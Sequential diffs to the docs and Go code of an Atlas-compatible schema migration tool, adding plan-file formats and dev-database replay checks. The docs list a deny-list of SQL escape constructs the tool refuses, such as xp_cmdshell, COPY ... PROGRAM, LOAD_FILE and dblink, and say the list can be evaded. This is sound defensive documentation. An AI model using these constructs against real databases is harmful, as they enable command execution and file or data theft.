@@ -327,16 +327,21 @@ content — including `.plan.hcl` files written by the licensed Atlas binary:
 
 Before replaying, Ptah refuses statements that match a **deny-list of known
 escape constructs** — `ATTACH`/`DETACH`, `VACUUM INTO`,
-`PRAGMA temp_store_directory`, `DO` blocks, routine bodies calling
-file-access or `dblink` functions, `LOAD DATA INFILE`,
+storage-directory pragmas, `load_extension`, routine bodies and dynamic SQL
+calling file-access or `dblink` functions, `LOAD DATA INFILE`,
 `SELECT ... INTO OUTFILE`/`DUMPFILE`, `LOAD_FILE`, `ENGINE=FEDERATED`,
 `CREATE SERVER`, `INSTALL PLUGIN`/`COMPONENT`, `DATA`/`INDEX DIRECTORY`,
-`COPY ... PROGRAM` or `COPY` with a file path, `dblink`, `postgres_fdw`, and
-`file_fdw`:
+`COPY ... PROGRAM` or `COPY` with a file path, `dblink`, `postgres_fdw`,
+`file_fdw`, the SQL Server `xp_`/`sp_addlinkedserver`/`OPENROWSET` family, and
+ClickHouse's remote table engines:
 
 ```text
-error: pre-planned migration cannot be verified on a dev database: statement 1 uses ATTACH, which attaches another SQLite database file to the session ...
+error: pre-planned migration was refused before it reached the dev database: statement 1 uses ATTACH, which attaches another SQLite database file to the session ...
 ```
+
+An anonymous `DO` block is not itself refused — it is the standard PostgreSQL
+idiom for idempotent DDL, and a foreign plan is full of them — but what its
+body does is scanned like any other statement.
 
 **That list is best-effort and not exhaustive, and the replay is not a
 sandbox.** SQL dialects offer many ways to address something other than the
@@ -366,14 +371,24 @@ any plan SQL runs:
   database copy to an arbitrary path.
 - Native extensions cannot be loaded.
 
+What the engine does **not** stop, and the lint therefore still has to: the
+storage-directory pragmas (`temp_store_directory`, `data_store_directory` —
+the first is process-global in SQLite) and `PRAGMA writable_schema`. The last
+one has a consequence worth stating: a plan that sets `writable_schema` could
+edit the dev database's catalog directly, so the "converges to `--to`" verdict
+is not tamper-proof against the very document being verified. The verdict is a
+good-faith check, not an adversarial one.
+
 Ptah verifies the restriction is in force before rehearsing, and refuses to
 rehearse if it is not, so this cannot fail silently. These are engine
 refusals: they hold for statements the lint never recognized, including ones
 built by string concatenation at run time.
 
-For an operator-supplied `--dev-url`, none of the above applies: that database
-executes the plan's SQL for real, with whatever credentials and network reach
-you gave it.
+The restriction keys on the **dev** database's dialect, not on who supplied
+it, so an operator-supplied SQLite `--dev-url` gets exactly the same engine
+refusals. For any dialect other than SQLite, none of the above applies: that
+database executes the plan's SQL for real, with whatever credentials and
+network reach you gave it.
 
 The verification also runs under `--dry-run`, so a plan received from someone
 else can be checked without committing to apply it.

--- a/docs/site/src/content/docs/atlas/schema-commands.md
+++ b/docs/site/src/content/docs/atlas/schema-commands.md
@@ -308,11 +308,27 @@ content — including `.plan.hcl` files written by the licensed Atlas binary:
 - An **Atlas-format plan** requires `--to`, exactly like the official binary
   (`the flag "to" is required to verify the provided plan`). Its hashes are
   re-verified with Ptah's own machinery: the plan is replayed on a dev
-  database (`--dev-url`, or an ephemeral SQLite dev database for SQLite
-  targets) starting from the target's current schema, and the reached state
+  database starting from the target's current schema, and the reached state
   must equal the `--to` desired state under Ptah's schema diff before the
-  target is touched. A Ptah-written `.plan.hcl` keeps native sha256
-  fingerprints, so it gets the stale-plan check too.
+  target is touched. SQLite targets get a throwaway dev database
+  automatically; every other dialect requires `--dev-url`. A Ptah-written
+  `.plan.hcl` keeps native sha256 fingerprints, so it gets the stale-plan
+  check too — but the replay runs either way, because the fingerprint shape
+  is public and must never be able to switch a verification off.
+
+The replay is a sandbox only for statements that cannot reach out of the dev
+database. A plan containing one that can — `ATTACH`/`DETACH`, `VACUUM INTO`,
+`LOAD DATA INFILE`, `SELECT ... INTO OUTFILE`/`DUMPFILE`, `COPY ... PROGRAM`
+or `COPY` with a file path, `dblink`, `postgres_fdw`, `file_fdw`, or the
+server-side file-access functions — is refused by name before anything runs
+anywhere:
+
+```text
+error: pre-planned migration cannot be verified on a dev database: statement 1 uses ATTACH, which attaches another SQLite database file to the session, so the statement can write to databases other than the dev database. Replaying it would not be a sandboxed rehearsal ...
+```
+
+The verification also runs under `--dry-run`, so a plan received from someone
+else can be checked without committing to apply it.
 
 After every `--plan` apply with a desired state available, the end state is
 verified again on the target — the semantic end-state verification Atlas

--- a/docs/site/src/content/docs/atlas/schema-commands.md
+++ b/docs/site/src/content/docs/atlas/schema-commands.md
@@ -316,16 +316,38 @@ content — including `.plan.hcl` files written by the licensed Atlas binary:
   check too — but the replay runs either way, because the fingerprint shape
   is public and must never be able to switch a verification off.
 
-The replay is a sandbox only for statements that cannot reach out of the dev
-database. A plan containing one that can — `ATTACH`/`DETACH`, `VACUUM INTO`,
-`LOAD DATA INFILE`, `SELECT ... INTO OUTFILE`/`DUMPFILE`, `COPY ... PROGRAM`
-or `COPY` with a file path, `dblink`, `postgres_fdw`, `file_fdw`, or the
-server-side file-access functions — is refused by name before anything runs
-anywhere:
+### The replay is not a sandbox
+
+Before replaying, Ptah refuses statements that match a **deny-list of known
+escape constructs** — `ATTACH`/`DETACH`, `VACUUM INTO`,
+`PRAGMA temp_store_directory`, `DO` blocks, routine bodies calling
+file-access or `dblink` functions, `LOAD DATA INFILE`,
+`SELECT ... INTO OUTFILE`/`DUMPFILE`, `LOAD_FILE`, `ENGINE=FEDERATED`,
+`CREATE SERVER`, `INSTALL PLUGIN`/`COMPONENT`, `DATA`/`INDEX DIRECTORY`,
+`COPY ... PROGRAM` or `COPY` with a file path, `dblink`, `postgres_fdw`, and
+`file_fdw`:
 
 ```text
-error: pre-planned migration cannot be verified on a dev database: statement 1 uses ATTACH, which attaches another SQLite database file to the session, so the statement can write to databases other than the dev database. Replaying it would not be a sandboxed rehearsal ...
+error: pre-planned migration cannot be verified on a dev database: statement 1 uses ATTACH, which attaches another SQLite database file to the session ...
 ```
+
+**That list is best-effort and not exhaustive, and the replay is not a
+sandbox.** SQL dialects offer many ways to address something other than the
+connected database — server-side language extensions, foreign-data wrappers,
+storage-engine options, loadable modules, and engine-specific pragmas and
+functions — and new ones arrive with new engine versions. Treat the deny-list
+as a tripwire for honest mistakes and known tricks, not as a security
+boundary against a hostile plan author.
+
+The practical rule: **a `--dev-url` must point at a database you are willing
+to have a foreign plan file execute arbitrary SQL against.** Use a disposable
+dev database, not one that shares a server, credentials, or filesystem with
+anything you care about.
+
+The one path with no such exposure is the ephemeral SQLite dev database Ptah
+creates for SQLite targets: a throwaway file in a private temporary
+directory, removed when the command exits, with no operator-supplied
+credentials involved.
 
 The verification also runs under `--dry-run`, so a plan received from someone
 else can be checked without committing to apply it.

--- a/docs/site/src/content/docs/atlas/schema-commands.md
+++ b/docs/site/src/content/docs/atlas/schema-commands.md
@@ -41,6 +41,13 @@ ptah-compat schema inspect --url "$DATABASE_URL" --format sql > schema.sql
 ptah-compat schema inspect --url "$DATABASE_URL" --format json > schema.json
 ```
 
+:::caution[A dev database executes SQL for real]
+Whatever you pass as `--dev-url` runs the SQL Ptah is evaluating, so point it
+at a disposable database. This matters most when the SQL came from a plan file
+someone else wrote — see
+[The replay is not a sandbox](#the-replay-is-not-a-sandbox).
+:::
+
 Non-database sources require `--dev-url`, mirroring Atlas dev-database
 normalization: the dev database is reset destructively, the source is
 materialized on it (schema files executed, migration directories replayed),
@@ -342,12 +349,31 @@ boundary against a hostile plan author.
 The practical rule: **a `--dev-url` must point at a database you are willing
 to have a foreign plan file execute arbitrary SQL against.** Use a disposable
 dev database, not one that shares a server, credentials, or filesystem with
-anything you care about.
+anything you care about. The lint is a tripwire in front of it, not a wall
+around it.
 
-The one path with no such exposure is the ephemeral SQLite dev database Ptah
-creates for SQLite targets: a throwaway file in a private temporary
-directory, removed when the command exits, with no operator-supplied
-credentials involved.
+### Where enforcement is real
+
+The ephemeral SQLite dev database — the one Ptah creates for SQLite targets,
+which you never opt into — is the exception, and it does not rely on the lint
+at all. It is a throwaway file in a private temporary directory, removed when
+the command exits, and its session is restricted at the engine level before
+any plan SQL runs:
+
+- `ATTACH` and `DETACH` are refused by SQLite itself, so plan SQL cannot reach
+  another database file — including the real target.
+- `VACUUM INTO` is refused by the same restriction, so it cannot write a
+  database copy to an arbitrary path.
+- Native extensions cannot be loaded.
+
+Ptah verifies the restriction is in force before rehearsing, and refuses to
+rehearse if it is not, so this cannot fail silently. These are engine
+refusals: they hold for statements the lint never recognized, including ones
+built by string concatenation at run time.
+
+For an operator-supplied `--dev-url`, none of the above applies: that database
+executes the plan's SQL for real, with whatever credentials and network reach
+you gave it.
 
 The verification also runs under `--dry-run`, so a plan received from someone
 else can be checked without committing to apply it.
@@ -385,11 +411,11 @@ names both fingerprints:
 error: pre-planned migration is stale: the target database schema does not match the plan's source fingerprint (plan sha256:..., database sha256:...); the database changed since the plan was computed, so re-run `schema plan` against the current database and review the fresh plan
 ```
 
-For an Atlas-authored plan the drift surfaces semantically, with the target
-left unchanged:
+For an Atlas-authored plan the drift surfaces semantically, and the plan is
+not applied to the target:
 
 ```text
-error: pre-planned migration does not converge to the desired state: replaying the plan on the dev database, starting from the target's current schema, left the following schema drift against --to (the target database was left unchanged):
+error: pre-planned migration does not converge to the desired state: replaying the plan on the dev database, starting from the target's current schema, left the following schema drift against --to (the plan was not applied to the target):
 ...
 ```
 

--- a/docs/site/src/content/docs/atlas/schema-commands.md
+++ b/docs/site/src/content/docs/atlas/schema-commands.md
@@ -282,44 +282,77 @@ ptah-compat schema apply \
 ## Save and execute plan files
 
 `ptah-compat schema plan` is the open local replacement for Atlas's Pro
-registry-gated plan workflow.
+registry-gated plan workflow, and it speaks Atlas's plan-file format.
 
 It computes the same declarative plan `schema apply` would generate — from the
 `--from` target database to the local `--to` schema files — and saves it as a
-local JSON plan file (`format_version` 1) that records the ordered SQL
-statements with per-statement safety severity, the dialect, and the SHA-256
-fingerprints of the source and desired schema states.
+local plan file. The default format is the Atlas `.plan.hcl` shape: one
+`plan "<name>"` block with `from`/`to` fingerprints and the migration SQL in a
+heredoc, named with an Atlas-style UTC timestamp. The written file parses in
+Atlas's own plan reader; the `from`/`to` values are Ptah's sha256
+fingerprints, which the official binary parses but cannot verify against its
+own base64 hashes (those have no local recipe — in either direction). An
+`--output` path ending in `.json` writes the native JSON plan
+(`format_version` 1) instead, which additionally records per-statement safety
+severity, the dialect, and exclude patterns. Without
+`--save`/`--output`/`--dry-run`, the plan document prints to stdout, and
+`--auto-approve` is accepted for CLI compatibility.
 
-`schema apply --plan file://<path>` then executes exactly the reviewed
-statements after verifying the live database still matches the plan's source
-fingerprint; a drifted database refuses with a stale-plan error instead of
-running reviewed SQL against unreviewed state.
+`schema apply --plan file://<path>` accepts both formats, detected by
+content — including `.plan.hcl` files written by the licensed Atlas binary:
+
+- A **JSON plan** executes after verifying the live database still matches
+  the plan's recorded source fingerprint; a drifted database refuses with a
+  stale-plan error instead of running reviewed SQL against unreviewed state.
+  `--to` is optional.
+- An **Atlas-format plan** requires `--to`, exactly like the official binary
+  (`the flag "to" is required to verify the provided plan`). Its hashes are
+  re-verified with Ptah's own machinery: the plan is replayed on a dev
+  database (`--dev-url`, or an ephemeral SQLite dev database for SQLite
+  targets) starting from the target's current schema, and the reached state
+  must equal the `--to` desired state under Ptah's schema diff before the
+  target is touched. A Ptah-written `.plan.hcl` keeps native sha256
+  fingerprints, so it gets the stale-plan check too.
+
+After every `--plan` apply with a desired state available, the end state is
+verified again on the target — the semantic end-state verification Atlas
+performs — and a mismatch fails loudly. There is no flag to disable it.
 
 ```bash
-# Compute and save the plan for review (or --save for ./<name>.plan.json).
+# Compute and save the plan for review (or --save for ./<timestamp>.plan.hcl).
 ptah-compat schema plan \
   --from "$DATABASE_URL" \
   --to file://schema.sql \
-  --output add-orders.plan.json
+  --output add-orders.plan.hcl
 
 # Later, execute exactly the reviewed plan; drift refuses loudly.
 ptah-compat schema apply \
   --url "$DATABASE_URL" \
-  --plan file://add-orders.plan.json \
+  --to file://schema.sql \
+  --plan file://add-orders.plan.hcl \
   --auto-approve
 ```
 
 Expected output of the plan step ends with:
 
 ```text
-Plan saved to file://add-orders.plan.json
+Plan saved to file://add-orders.plan.hcl
 ```
 
-If the target database changed after the plan was saved, apply refuses with a
-stale-plan error naming both fingerprints:
+If the target database changed after the plan was saved, apply refuses before
+touching the target. For a plan with native fingerprints the stale-plan error
+names both fingerprints:
 
 ```text
 error: pre-planned migration is stale: the target database schema does not match the plan's source fingerprint (plan sha256:..., database sha256:...); the database changed since the plan was computed, so re-run `schema plan` against the current database and review the fresh plan
+```
+
+For an Atlas-authored plan the drift surfaces semantically, with the target
+left unchanged:
+
+```text
+error: pre-planned migration does not converge to the desired state: replaying the plan on the dev database, starting from the target's current schema, left the following schema drift against --to (the target database was left unchanged):
+...
 ```
 
 ## Diff schema files

--- a/docs/site/src/content/docs/reference/atlas-commands.md
+++ b/docs/site/src/content/docs/reference/atlas-commands.md
@@ -375,11 +375,14 @@ re-planning. Both plan formats are accepted, detected by content: the Atlas
   concatenation alone defeats any scanner, so a `--dev-url` must point at a
   database you are willing to have a foreign plan file execute arbitrary SQL
   against.
-- **Real enforcement exists only on the ephemeral SQLite dev database** Ptah
-  creates for SQLite targets: a throwaway file in a private temp directory
-  whose session refuses `ATTACH`, `DETACH`, and `VACUUM INTO` at the engine
-  level and cannot load extensions. Ptah verifies the restriction is in force
-  before rehearsing and refuses to rehearse if it is not. See
+- **Real enforcement exists only on SQLite dev databases** — the ephemeral one
+  Ptah creates for SQLite targets, and an operator-supplied SQLite
+  `--dev-url`, since the restriction keys on the dev dialect. Their sessions
+  refuse `ATTACH`, `DETACH`, and `VACUUM INTO` at the engine level and cannot
+  load extensions; Ptah verifies the restriction is in force before rehearsing
+  and refuses to rehearse if it is not. Storage-directory pragmas and
+  `writable_schema` are not covered, so the converges-to-`--to` verdict is a
+  good-faith check rather than an adversarial one. See
   [Save and execute plan files](../../atlas/schema-commands/#where-enforcement-is-real).
 - The replay also runs under `--dry-run`, so a plan can be verified without
   committing to apply it.

--- a/docs/site/src/content/docs/reference/atlas-commands.md
+++ b/docs/site/src/content/docs/reference/atlas-commands.md
@@ -355,9 +355,17 @@ re-planning. Both plan formats are accepted, detected by content: the Atlas
   target refuses with a stale-plan error — and may run without `--to`.
 - An Atlas-format plan requires `--to`, matching the official binary: its
   hashes are Atlas-computed with no local recipe, so the plan is replayed on
-  a dev database (`--dev-url`, or an ephemeral SQLite dev database for SQLite
-  targets) from the target's current schema, and the reached state must equal
-  the `--to` desired state before the target is touched.
+  a dev database from the target's current schema, and the reached state must
+  equal the `--to` desired state before the target is touched. SQLite targets
+  get a throwaway dev database automatically; every other dialect requires
+  `--dev-url`.
+- The replay only sandboxes statements that cannot leave the dev database, so
+  a plan containing one that can — `ATTACH`/`DETACH`, `VACUUM INTO`,
+  `LOAD DATA INFILE`, `INTO OUTFILE`/`DUMPFILE`, `COPY ... PROGRAM` or `COPY`
+  with a file path, `dblink`, `postgres_fdw`, `file_fdw`, or the
+  file-access functions — is refused by name before anything executes.
+- The replay also runs under `--dry-run`, so a plan can be verified without
+  committing to apply it.
 - Whenever a desired state is available, the end state is verified again on
   the target after the apply and a mismatch fails loudly; the verification is
   always on, like Atlas's.
@@ -396,8 +404,8 @@ plan document prints to stdout.
 
 | Flag | Behavior |
 | --- | --- |
-| `--save` | Writes `<name>.plan.hcl`, using an Atlas-style UTC timestamp default name or `--name`. |
-| `--output <path>`/`-o` | Chooses the location; a `.json` path selects the native JSON plan format (deterministic fingerprint-derived default name). |
+| `--save` | Writes `<name>.plan.hcl`, using an Atlas-style UTC timestamp default name or `--name`. Refuses to overwrite an existing default-named file, since the timestamp has one-second granularity. |
+| `--output <path>`/`-o` | Chooses the location, and a `.json` path selects the native JSON plan format. The plan name recorded inside a JSON plan stays fingerprint-derived unless `--name` is given. |
 | `--dry-run` | Prints the plan document without saving. |
 | `--auto-approve` | Accepted for Atlas CLI compatibility; a locally saved plan file is approved by operator review, so there is no prompt to skip. |
 | `--env` | Reads `url` (the plan target), `schema.src`, `dev`, `exclude`, `schema.mode`, and supported `diff` policy from `atlas.hcl`. |

--- a/docs/site/src/content/docs/reference/atlas-commands.md
+++ b/docs/site/src/content/docs/reference/atlas-commands.md
@@ -359,11 +359,19 @@ re-planning. Both plan formats are accepted, detected by content: the Atlas
   equal the `--to` desired state before the target is touched. SQLite targets
   get a throwaway dev database automatically; every other dialect requires
   `--dev-url`.
-- The replay only sandboxes statements that cannot leave the dev database, so
-  a plan containing one that can — `ATTACH`/`DETACH`, `VACUUM INTO`,
-  `LOAD DATA INFILE`, `INTO OUTFILE`/`DUMPFILE`, `COPY ... PROGRAM` or `COPY`
-  with a file path, `dblink`, `postgres_fdw`, `file_fdw`, or the
-  file-access functions — is refused by name before anything executes.
+- Before replaying, statements matching a deny-list of known escape
+  constructs are refused by name before anything executes: `ATTACH`/`DETACH`,
+  `VACUUM INTO`, `PRAGMA temp_store_directory`, `DO` blocks, routine bodies
+  calling file-access or `dblink` functions, `LOAD DATA INFILE`,
+  `INTO OUTFILE`/`DUMPFILE`, `LOAD_FILE`, `ENGINE=FEDERATED`,
+  `CREATE SERVER`, `INSTALL PLUGIN`/`COMPONENT`, `DATA`/`INDEX DIRECTORY`,
+  `COPY ... PROGRAM` or `COPY` with a file path, `dblink`, `postgres_fdw`,
+  and `file_fdw`.
+- **The deny-list is best-effort, not exhaustive, and the replay is not a
+  sandbox.** A `--dev-url` must point at a database you are willing to have a
+  foreign plan file execute arbitrary SQL against; only the ephemeral SQLite
+  dev database Ptah creates for SQLite targets (a throwaway file in a private
+  temp directory) carries no such exposure.
 - The replay also runs under `--dry-run`, so a plan can be verified without
   committing to apply it.
 - Whenever a desired state is available, the end state is verified again on

--- a/docs/site/src/content/docs/reference/atlas-commands.md
+++ b/docs/site/src/content/docs/reference/atlas-commands.md
@@ -360,18 +360,27 @@ re-planning. Both plan formats are accepted, detected by content: the Atlas
   get a throwaway dev database automatically; every other dialect requires
   `--dev-url`.
 - Before replaying, statements matching a deny-list of known escape
-  constructs are refused by name before anything executes: `ATTACH`/`DETACH`,
-  `VACUUM INTO`, `PRAGMA temp_store_directory`, `DO` blocks, routine bodies
-  calling file-access or `dblink` functions, `LOAD DATA INFILE`,
-  `INTO OUTFILE`/`DUMPFILE`, `LOAD_FILE`, `ENGINE=FEDERATED`,
-  `CREATE SERVER`, `INSTALL PLUGIN`/`COMPONENT`, `DATA`/`INDEX DIRECTORY`,
-  `COPY ... PROGRAM` or `COPY` with a file path, `dblink`, `postgres_fdw`,
-  and `file_fdw`.
-- **The deny-list is best-effort, not exhaustive, and the replay is not a
-  sandbox.** A `--dev-url` must point at a database you are willing to have a
-  foreign plan file execute arbitrary SQL against; only the ephemeral SQLite
-  dev database Ptah creates for SQLite targets (a throwaway file in a private
-  temp directory) carries no such exposure.
+  constructs are refused by name before anything executes. The lint covers
+  SQLite (`ATTACH`/`DETACH`, `VACUUM INTO`, storage-directory pragmas,
+  `load_extension`), PostgreSQL (`DO` blocks, routine bodies and dynamic SQL
+  calling file-access or `dblink` functions, `COPY ... PROGRAM` or `COPY` with
+  a file path, `postgres_fdw`, `file_fdw`), MySQL/MariaDB
+  (`LOAD DATA INFILE`, `INTO OUTFILE`/`DUMPFILE`, `LOAD_FILE`,
+  `ENGINE=FEDERATED`, `CREATE SERVER`, `INSTALL PLUGIN`/`COMPONENT`,
+  `DATA`/`INDEX DIRECTORY`), SQL Server (`xp_cmdshell`, `xp_dirtree`,
+  `OPENROWSET`, `OPENDATASOURCE`, `BULK INSERT`, `sp_addlinkedserver`), and
+  ClickHouse (`URL`, `File`, `S3`, `HDFS`, `MySQL`, `PostgreSQL` table
+  engines).
+- **The lint is best-effort, not exhaustive, and it is not a sandbox.** String
+  concatenation alone defeats any scanner, so a `--dev-url` must point at a
+  database you are willing to have a foreign plan file execute arbitrary SQL
+  against.
+- **Real enforcement exists only on the ephemeral SQLite dev database** Ptah
+  creates for SQLite targets: a throwaway file in a private temp directory
+  whose session refuses `ATTACH`, `DETACH`, and `VACUUM INTO` at the engine
+  level and cannot load extensions. Ptah verifies the restriction is in force
+  before rehearsing and refuses to rehearse if it is not. See
+  [Save and execute plan files](../../atlas/schema-commands/#where-enforcement-is-real).
 - The replay also runs under `--dry-run`, so a plan can be verified without
   committing to apply it.
 - Whenever a desired state is available, the end state is verified again on

--- a/docs/site/src/content/docs/reference/atlas-commands.md
+++ b/docs/site/src/content/docs/reference/atlas-commands.md
@@ -347,11 +347,23 @@ filters. Repeated values union deterministically, `--exclude` plus disabled
 `schema.mode` values subtract afterward, cross-scope dependencies refuse the
 plan with explicit diagnostics, and an empty selection reports a synced schema.
 
-**`--plan file://<path>`** executes a pre-approved local plan file saved by
-`schema plan`, after verifying the database still matches the plan's source
-fingerprint. A drifted target refuses with a stale-plan error, registry
-`atlas://` plan URLs are rejected, and `--plan` cannot be combined with `--to`,
-`--file`, `--dev-url`, `--exclude`, `--schema`, `--include`, or `--edit`.
+**`--plan file://<path>`** executes a pre-approved local plan file instead of
+re-planning. Both plan formats are accepted, detected by content: the Atlas
+`.plan.hcl` shape and Ptah's native format_version-1 `.plan.json`.
+
+- A JSON plan is verified against its recorded source fingerprint — a drifted
+  target refuses with a stale-plan error — and may run without `--to`.
+- An Atlas-format plan requires `--to`, matching the official binary: its
+  hashes are Atlas-computed with no local recipe, so the plan is replayed on
+  a dev database (`--dev-url`, or an ephemeral SQLite dev database for SQLite
+  targets) from the target's current schema, and the reached state must equal
+  the `--to` desired state before the target is touched.
+- Whenever a desired state is available, the end state is verified again on
+  the target after the apply and a mismatch fails loudly; the verification is
+  always on, like Atlas's.
+- Registry `atlas://` plan URLs are rejected. `--plan` cannot be combined
+  with `--file`, `--exclude`, `--schema`, `--include`, or `--edit`, and
+  `--dev-url` combines with `--plan` only together with `--to`.
 
 **`--lock-timeout`** bounds waiting for the session advisory lock that
 serializes concurrent schema applies against one target. The lock is acquired
@@ -373,25 +385,36 @@ Native twin: [`ptah schema apply`](../native-commands/).
 ### `ptah-compat schema plan`
 
 Computes the declarative migration from the `--from` target database to local
-`--to` schema files and saves it as a fingerprinted local plan file.
+`--to` schema files and saves it as a local plan file. The default format is
+the Atlas `.plan.hcl` shape — one `plan` block with `from`/`to` fingerprints
+and the migration SQL — so the saved file is readable by Atlas's plan reader;
+an `--output` path ending in `.json` writes the native fingerprinted JSON
+plan (format version 1) instead. Without `--save`/`--output`/`--dry-run`, the
+plan document prints to stdout.
 
 **Flags**
 
 | Flag | Behavior |
 | --- | --- |
-| `--save` | Writes `<name>.plan.json`, using a deterministic fingerprint-derived default name or `--name`. |
-| `--output <path>` | Chooses the location. |
+| `--save` | Writes `<name>.plan.hcl`, using an Atlas-style UTC timestamp default name or `--name`. |
+| `--output <path>`/`-o` | Chooses the location; a `.json` path selects the native JSON plan format (deterministic fingerprint-derived default name). |
 | `--dry-run` | Prints the plan document without saving. |
+| `--auto-approve` | Accepted for Atlas CLI compatibility; a locally saved plan file is approved by operator review, so there is no prompt to skip. |
 | `--env` | Reads `url` (the plan target), `schema.src`, `dev`, `exclude`, `schema.mode`, and supported `diff` policy from `atlas.hcl`. |
 
 The JSON plan records the ordered SQL statements with per-statement safety
 severity, the dialect, the exclude patterns, and SHA-256 fingerprints of the
-source and desired schema states.
+source and desired schema states. The `.plan.hcl` shape carries only the
+name, the fingerprints, and the migration SQL; Ptah writes its own sha256
+fingerprints there (the official binary parses the file but verifies its own
+base64 hashes, which have no local recipe), re-derives statement severity at
+read time, and refuses to save a plan computed with `--exclude` as
+`.plan.hcl` because the shape cannot record the patterns.
 
 **Not implemented**
 
-- Registry-bound `--push`, `--pending`, `--repo`, and `--auto-approve` are
-  recorded waivers that fail loudly.
+- Registry-bound `--push`, `--pending`, and `--repo` are recorded waivers
+  that fail loudly.
 - `--edit`, `--skip-lint`, `--format`, `--name-format`, `--directive`,
   `--schema`, `--include`, and `--lock-timeout` fail explicitly until
   implemented.

--- a/internal/atlasschema/apply.go
+++ b/internal/atlasschema/apply.go
@@ -277,6 +277,23 @@ func ApplySQL(
 	return applyStatements(ctx, conn, txMode, SplitApplyStatements(sqlText, conn.Info().Dialect))
 }
 
+// ApplyStatements executes an already-split ordered statement list under
+// txMode. Callers that verified a specific statement list must execute that
+// same list instead of re-splitting SQL text, so what was checked is what
+// runs.
+func ApplyStatements(
+	ctx context.Context,
+	conn *dbschema.DatabaseConnection,
+	txMode migrator.MigrationTxMode,
+	statements []string,
+) error {
+	if conn == nil {
+		return errors.New("schema apply execution requires database connection")
+	}
+
+	return applyStatements(ctx, conn, txMode, statements)
+}
+
 // applyStatements executes the ordered statements on conn under txMode. It is
 // shared by the target apply and the dev database simulation, so both run the
 // exact same ordered plan through the same execution path.

--- a/internal/atlasschema/plan.go
+++ b/internal/atlasschema/plan.go
@@ -185,14 +185,21 @@ func MarshalPlanFile(plan PlanFile) ([]byte, error) {
 	return append(document, '\n'), nil
 }
 
-// ReadPlanFile loads and validates a local plan document. Unknown fields are
-// rejected so a hand-edited or truncated plan fails loudly instead of being
-// partially honored.
+// ReadPlanFile loads and validates a local JSON plan document. Unknown fields
+// are rejected so a hand-edited or truncated plan fails loudly instead of
+// being partially honored. The Atlas-compatible command tree reads both
+// supported encodings through [ReadPlanDocument] instead.
 func ReadPlanFile(path string) (PlanFile, error) {
 	contents, err := os.ReadFile(path)
 	if err != nil {
 		return PlanFile{}, fmt.Errorf("read plan file: %w", err)
 	}
+	return decodePlanJSON(contents, path)
+}
+
+// decodePlanJSON parses and validates the native format_version-1 JSON plan
+// document.
+func decodePlanJSON(contents []byte, path string) (PlanFile, error) {
 	decoder := json.NewDecoder(bytes.NewReader(contents))
 	decoder.DisallowUnknownFields()
 	var plan PlanFile
@@ -213,7 +220,9 @@ func VerifyPlanTarget(conn *dbschema.DatabaseConnection, plan PlanFile) error {
 	if conn == nil {
 		return errors.New("plan verification requires database connection")
 	}
-	if !planDialectsCompatible(plan.Dialect, conn.Info().Dialect) {
+	// Atlas-format plan files carry no dialect field; for those the rehearsal
+	// and desired-state verification pin the semantics instead.
+	if plan.Dialect != "" && !planDialectsCompatible(plan.Dialect, conn.Info().Dialect) {
 		return fmt.Errorf("plan file targets dialect %q, but the --url database dialect is %q",
 			plan.Dialect, conn.Info().Dialect)
 	}

--- a/internal/atlasschema/plan.go
+++ b/internal/atlasschema/plan.go
@@ -187,12 +187,22 @@ func MarshalPlanFile(plan PlanFile) ([]byte, error) {
 
 // ReadPlanFile loads and validates a local JSON plan document. Unknown fields
 // are rejected so a hand-edited or truncated plan fails loudly instead of
-// being partially honored. The Atlas-compatible command tree reads both
-// supported encodings through [ReadPlanDocument] instead.
+// being partially honored. The native plan format is JSON only: an Atlas
+// `.plan.hcl` document is refused with a named error naming the command that
+// does read it, rather than the raw JSON decoder complaint. The
+// Atlas-compatible command tree reads both encodings through
+// [ReadPlanDocument].
 func ReadPlanFile(path string) (PlanFile, error) {
 	contents, err := os.ReadFile(path)
 	if err != nil {
 		return PlanFile{}, fmt.Errorf("read plan file: %w", err)
+	}
+	if DetectPlanFormat(contents) == PlanFormatHCL {
+		return PlanFile{}, fmt.Errorf(
+			"plan file %s is in the Atlas %s format, which the native `ptah schema apply --plan` does not read; "+
+				"apply it with `ptah-compat schema apply --plan file://%s --to <desired state>`, "+
+				"or produce a native plan with `ptah schema plan --output <name>%s`",
+			path, PlanFileSuffixHCL, path, PlanFileSuffix)
 	}
 	return decodePlanJSON(contents, path)
 }

--- a/internal/atlasschema/plan_test.go
+++ b/internal/atlasschema/plan_test.go
@@ -165,9 +165,17 @@ func TestReadPlanFileValidatesContract(t *testing.T) {
 		want     string
 	}{
 		{
-			name:     "not_json",
-			contents: "plan {}",
-			want:     `parse plan file .*`,
+			// The native reader is JSON-only, but an Atlas plan document is a
+			// likely mistake and must say so instead of leaking a JSON
+			// decoder complaint about the letter 'p'.
+			name:     "atlas_hcl_plan_document",
+			contents: "plan \"x\" {\n  from = \"a\"\n  to = \"b\"\n  migration = \"c;\"\n}\n",
+			want:     `plan file .* is in the Atlas \.plan\.hcl format, which the native .ptah schema apply --plan. does not read; apply it with .ptah-compat schema apply --plan file://.*`,
+		},
+		{
+			name:     "not_json_and_not_hcl",
+			contents: "%%%",
+			want:     `plan file .* is in the Atlas \.plan\.hcl format.*`,
 		},
 		{
 			name:     "unknown_field",

--- a/internal/atlasschema/planfile_hcl.go
+++ b/internal/atlasschema/planfile_hcl.go
@@ -1,6 +1,7 @@
 package atlasschema
 
 import (
+	"bytes"
 	"errors"
 	"fmt"
 	"maps"
@@ -8,6 +9,7 @@ import (
 	"slices"
 	"strings"
 	"time"
+	"unicode/utf8"
 
 	"github.com/hashicorp/hcl/v2"
 	"github.com/hashicorp/hcl/v2/hclsyntax"
@@ -47,10 +49,16 @@ const hclPlanHeredocDelimiter = "SQL"
 // the `<<-SQL` heredoc content in Atlas-written plan files.
 const hclPlanBodyIndent = "  "
 
+// utf8BOM is stripped before format detection so a BOM-prefixed JSON plan is
+// not misread as an HCL document.
+var utf8BOM = []byte{0xEF, 0xBB, 0xBF}
+
 // DetectPlanFormat classifies plan-file contents. A JSON document starts with
-// '{' (after leading whitespace); everything else is treated as the Atlas HCL
-// plan format, whose top level is always a `plan` block.
+// '{' (after an optional UTF-8 BOM and leading whitespace); everything else is
+// treated as the Atlas HCL plan format, whose top level is always a `plan`
+// block.
 func DetectPlanFormat(contents []byte) PlanFormat {
+	contents = bytes.TrimPrefix(contents, utf8BOM)
 	for _, b := range contents {
 		switch b {
 		case ' ', '\t', '\r', '\n':
@@ -172,12 +180,22 @@ func MarshalPlanFileHCL(plan PlanFile) ([]byte, error) {
 	for _, statement := range plan.Statements {
 		text := strings.TrimSuffix(strings.TrimSpace(statement.SQL), ";") + ";"
